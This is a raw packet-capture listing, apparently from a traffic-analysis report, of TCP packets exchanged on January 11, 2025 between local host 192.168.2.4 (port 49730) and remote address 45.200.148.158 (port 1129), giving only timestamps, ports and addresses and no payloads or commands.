Jan 11, 2025 20:26:07.254374027 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.254381895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254395962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254410028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254414082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.254422903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254436016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.254437923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254451990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254462957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.254467010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254483938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.254489899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.254523039 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255204916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255218983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255234003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255247116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255261898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255275965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255275965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255290031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255291939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255305052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255307913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255331039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255345106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255346060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255358934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255373001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255384922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255387068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255402088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255405903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255418062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255434990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.255978107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.255991936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256006002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256019115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256021976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.256035089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256041050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.256048918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256062984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256076097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256082058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.256092072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.256103992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.256124020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341120958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341166019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341181993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341197968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341212988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341222048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341228962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341244936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341255903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341255903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341346025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341361046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341399908 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341526031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341557980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341562986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341592073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341624022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341656923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341687918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341722012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341737032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341737032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341768026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.341964960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.341996908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342029095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342044115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342061996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342093945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342127085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342135906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342159986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342165947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342348099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342380047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342413902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342428923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342446089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342478037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342499018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342510939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342518091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342545033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342744112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342813969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342848063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342880011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342912912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342924118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342947006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.342955112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.342979908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343012094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343017101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343044043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343075991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343086958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343107939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343141079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343146086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343436003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343467951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343477011 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343501091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343532085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343564034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343565941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343595028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343599081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343626976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343658924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343692064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343697071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343723059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343727112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343755960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343786955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343818903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343822956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343851089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343854904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.343883991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343916893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.343951941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344341040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344389915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344396114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344428062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344460964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344492912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344506979 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344525099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344532967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344557047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344588995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344593048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344620943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344652891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344683886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344687939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344716072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344719887 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344748020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344779968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344810963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344818115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344842911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344868898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.344876051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.344961882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.345320940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345355034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345386982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345418930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345422983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.345452070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345457077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.345484018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345516920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345521927 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.345549107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345581055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345602989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.345613956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345649004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.345685005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.345972061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346014023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346048117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346052885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346080065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346084118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346112967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346152067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346187115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346189022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346219063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346221924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346251965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346282005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346313953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346316099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346344948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346348047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346376896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346409082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346443892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346447945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346483946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346484900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346504927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346760988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346810102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346824884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346837997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346852064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346867085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346868992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346880913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346885920 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.346895933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.346930981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.431660891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431678057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431693077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431720972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.431781054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431796074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431811094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431827068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431828976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.431850910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.431920052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.431966066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.431981087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432050943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432065010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432080030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432086945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432121038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432223082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432238102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432250977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432271957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432274103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432286978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432312012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432470083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432483912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432498932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432503939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432512999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432528973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432535887 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432562113 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432761908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432775974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432790041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432804108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432818890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.432820082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.432842016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433021069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433034897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433048964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433054924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433083057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433238029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433252096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433264971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433279991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433285952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433294058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433307886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433324099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433329105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433339119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433348894 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433353901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433371067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433712959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433726072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433739901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433753967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433759928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433768034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433779955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433800936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.433971882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.433985949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434000015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434015036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434022903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434027910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434041977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434042931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434056044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434071064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434078932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434092999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434106112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434120893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434127092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434134960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434146881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434148073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434165001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434168100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434178114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434191942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434202909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434240103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434925079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434938908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434952021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434967041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434981108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.434989929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.434994936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435003042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435009003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435024023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435036898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435043097 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435050964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435065031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435070038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435077906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435087919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435092926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435107946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435107946 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435122013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435137033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435144901 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435165882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435941935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435956955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435970068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435982943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.435996056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.435997009 CET	1129	49730	45.200.148.158	192.168.2.4
